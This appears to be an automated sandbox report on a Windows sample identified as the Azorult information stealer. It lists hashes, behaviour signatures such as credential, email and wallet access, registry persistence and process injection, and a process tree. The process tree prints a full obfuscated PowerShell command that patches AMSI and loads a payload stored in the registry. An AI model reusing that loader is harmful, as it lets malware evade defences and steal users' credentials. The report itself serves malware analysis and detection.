Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
04-06-2024 11:22
Static task
static1
Behavioral task
behavioral1
Sample
IMG_1005752333.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
IMG_1005752333.exe
Resource
win10v2004-20240508-en
General
-
Target
IMG_1005752333.exe
-
Size
219KB
-
MD5
8816d5e592685626fbbfdb1b1b309d79
-
SHA1
650de5fc16a287c7801742ec92a2cc1ae7fcf4e8
-
SHA256
d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad
-
SHA512
323dcf2b6de01767912a05abb93f97c12667b450ad97274babdb8b58248b36c6578e249aec1066bb8afe9568fe450e54795458149d53b71204e312bb8c90bf7f
-
SSDEEP
3072:8OJNjggfyKg0KggLV0FOhJirBwtHwwEJx5Ehl/Qs7GzrlKFHZWazC3ayZyn+q/wD:5H10CtAbe
Malware Config
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1036 created 612 1036 powershell.EXE 5 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation $777e8b2c -
Executes dropped EXE 2 IoCs
pid Process 820 $77c6dd89 752 $777e8b2c -
Loads dropped DLL 4 IoCs
pid Process 752 $777e8b2c 752 $777e8b2c 752 $777e8b2c 752 $777e8b2c -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook $777e8b2c Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook $777e8b2c Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook $777e8b2c -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Ygoev = "C:\\Users\\Admin\\AppData\\Roaming\\$77Ygoev.exe" IMG_1005752333.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 14 IoCs
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 5064 set thread context of 820 5064 IMG_1005752333.exe 92 PID 1036 set thread context of 4784 1036 powershell.EXE 95 PID 5064 set thread context of 752 5064 IMG_1005752333.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 $777e8b2c Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString $777e8b2c -
Delays execution with timeout.exe 1 IoCs
pid Process 1048 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={7EFE0617-D683-4C35-884A-21AB35BE4EA0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717500219" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1036 powershell.EXE 1036 powershell.EXE 1036 powershell.EXE 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe 4784 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 5064 IMG_1005752333.exe Token: SeDebugPrivilege 1036 powershell.EXE Token: SeDebugPrivilege 1036 powershell.EXE Token: SeDebugPrivilege 4784 dllhost.exe Token: SeDebugPrivilege 5064 IMG_1005752333.exe Token: SeShutdownPrivilege 376 dwm.exe Token: SeCreatePagefilePrivilege 376 dwm.exe Token: SeTcbPrivilege 672 lsass.exe Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 376 dwm.exe Token: SeCreatePagefilePrivilege 376 dwm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5064 wrote to memory of 820 5064 IMG_1005752333.exe 92 PID 5064 wrote to memory of 820 5064 IMG_1005752333.exe 92 PID 5064 wrote to memory of 820 5064 IMG_1005752333.exe 92 PID 5064 wrote to memory of 820 5064 IMG_1005752333.exe 92 PID 5064 wrote to memory of 820 5064 IMG_1005752333.exe 92 PID 5064 wrote to memory of 820 5064 IMG_1005752333.exe 92 PID 5064 wrote to memory of 820 5064 IMG_1005752333.exe 92 PID 5064 wrote to memory of 820 5064 IMG_1005752333.exe 92 PID 5064 wrote to memory of 820 5064 IMG_1005752333.exe 92 PID 1036 wrote to memory of 4784 1036 powershell.EXE 95 PID 1036 wrote to memory of 4784 1036 powershell.EXE 95 PID 1036 wrote to memory of 4784 1036 powershell.EXE 95 PID 1036 wrote to memory of 4784 1036 powershell.EXE 95 PID 1036 wrote to memory of 4784 1036 powershell.EXE 95 PID 1036 wrote to memory of 4784 1036 powershell.EXE 95 PID 1036 wrote to memory of 4784 1036 powershell.EXE 95 PID 1036 wrote to memory of 4784 1036 powershell.EXE 95 PID 4784 wrote to memory of 612 4784 dllhost.exe 5 PID 4784 wrote to memory of 672 4784 dllhost.exe 7 PID 4784 wrote to memory of 964 4784 dllhost.exe 12 PID 4784 wrote to memory of 376 4784 dllhost.exe 13 PID 4784 wrote to memory of 508 4784 dllhost.exe 14 PID 4784 wrote to memory of 932 4784 dllhost.exe 15 PID 4784 wrote to memory of 1088 4784 dllhost.exe 17 PID 4784 wrote to memory of 1100 4784 dllhost.exe 18 PID 4784 wrote to memory of 1148 4784 dllhost.exe 19 PID 4784 wrote to memory of 1176 4784 dllhost.exe 20 PID 4784 wrote to memory of 1284 4784 dllhost.exe 21 PID 4784 wrote to memory of 1340 4784 dllhost.exe 22 PID 4784 wrote to memory of 1352 4784 dllhost.exe 23 PID 4784 wrote to memory of 1392 4784 dllhost.exe 24 PID 4784 wrote to memory of 1516 4784 dllhost.exe 25 PID 4784 wrote to memory of 1540 4784 dllhost.exe 26 PID 4784 wrote to memory of 1564 4784 dllhost.exe 27 PID 4784 wrote to memory of 1680 4784 dllhost.exe 28 PID 4784 wrote to memory of 1696 4784 dllhost.exe 29 PID 4784 wrote to memory of 1760 4784 dllhost.exe 30 PID 4784 wrote to memory of 1788 4784 dllhost.exe 31 PID 4784 wrote to memory of 1828 4784 dllhost.exe 32 PID 4784 wrote to memory of 1944 4784 dllhost.exe 33 PID 4784 wrote to memory of 1952 4784 dllhost.exe 34 PID 4784 wrote to memory of 1996 4784 dllhost.exe 35 PID 4784 wrote to memory of 1144 4784 dllhost.exe 36 PID 4784 wrote to memory of 2080 4784 dllhost.exe 37 PID 4784 wrote to memory of 2096 4784 dllhost.exe 38 PID 4784 wrote to memory of 2236 4784 dllhost.exe 40 PID 4784 wrote to memory of 2288 4784 dllhost.exe 41 PID 4784 wrote to memory of 2464 4784 dllhost.exe 42 PID 4784 wrote to memory of 2472 4784 dllhost.exe 43 PID 4784 wrote to memory of 2616 4784 dllhost.exe 44 PID 4784 wrote to memory of 2632 4784 dllhost.exe 45 PID 4784 wrote to memory of 2756 4784 dllhost.exe 46 PID 4784 wrote to memory of 2768 4784 dllhost.exe 47 PID 4784 wrote to memory of 2776 4784 dllhost.exe 48 PID 4784 wrote to memory of 2828 4784 dllhost.exe 49 PID 4784 wrote to memory of 2852 4784 dllhost.exe 50 PID 4784 wrote to memory of 2880 4784 dllhost.exe 51 PID 4784 wrote to memory of 2908 4784 dllhost.exe 52 PID 4784 wrote to memory of 3168 4784 dllhost.exe 53 PID 4784 wrote to memory of 3420 4784 dllhost.exe 55 PID 4784 wrote to memory of 3516 4784 dllhost.exe 56 PID 4784 wrote to memory of 3660 4784 dllhost.exe 57 PID 4784 wrote to memory of 3840 4784 dllhost.exe 58 PID 4784 wrote to memory of 3988 4784 dllhost.exe 60 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook $777e8b2c -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook $777e8b2c
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:376
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d98d7404-1429-4bfd-a5c2-4f14d0acc630}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4784
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:932
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1148
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ErDpaczYljFy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$afqUlgNWzYGgEx,[Parameter(Position=1)][Type]$ExStVbmAlB)$FAqyHlpbQWU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+'t'+'e'+[Char](100)+'D'+[Char](101)+'l'+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+'yM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+''+','+''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'e'+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+'toCl'+[Char](97)+'ss',[MulticastDelegate]);$FAqyHlpbQWU.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+'i'+''+'a'+''+'l'+''+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$afqUlgNWzYGgEx).SetImplementationFlags(''+'R'+'un'+'t'+''+'i'+''+'m'+''+'e'+''+','+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$FAqyHlpbQWU.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+'oke',''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+','+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'ua'+[Char](108)+'',$ExStVbmAlB,$afqUlgNWzYGgEx).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $FAqyHlpbQWU.CreateType();}$eEgjOGjhAgZCH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+'W'+'i'+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+'e'+''+[Char](78)+'a'+[Char](116)+'i'+[Char](118)+''+'e'+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+'s');$TdyTiBgeUPZWKb=$eEgjOGjhAgZCH.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XIkWJZYLHtwtpGVBdUu=ErDpaczYljFy @([String])([IntPtr]);$ClEwueHjLVLtFzPyLhNbdv=ErDpaczYljFy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zMSQWnHWQOp=$eEgjOGjhAgZCH.GetMethod('G'+'e'+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+'el'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+'l'+'l')));$yvZpjxhQhsFdwJ=$TdyTiBgeUPZWKb.Invoke($Null,@([Object]$zMSQWnHWQOp,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+'L'+[Char](105)+''+'b'+''+[Char](114)+'a'+[Char](114)+'y'+'A'+'')));$fgxqBHchFRXwUphTM=$TdyTiBgeUPZWKb.Invoke($Null,@([Object]$zMSQWnHWQOp,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$ajYnTEs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yvZpjxhQhsFdwJ,$XIkWJZYLHtwtpGVBdUu).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+'.'+'d'+'ll');$nOdSwRPBkericmLVa=$TdyTiBgeUPZWKb.Invoke($Null,@([Object]$ajYnTEs,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'i'+'S'+''+[Char](99)+''+'a'+''+[Char](110)+'B'+'u'+''+'f'+'f'+'e'+''+[Char](114)+'')));$WKIirINODv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fgxqBHchFRXwUphTM,$ClEwueHjLVLtFzPyLhNbdv).Invoke($nOdSwRPBkericmLVa,[uint32]8,4,[ref]$WKIirINODv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$nOdSwRPBkericmLVa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fgxqBHchFRXwUphTM,$ClEwueHjLVLtFzPyLhNbdv).Invoke($nOdSwRPBkericmLVa,[uint32]8,0x20,[ref]$WKIirINODv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+'t'+'ag'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1036
-
-
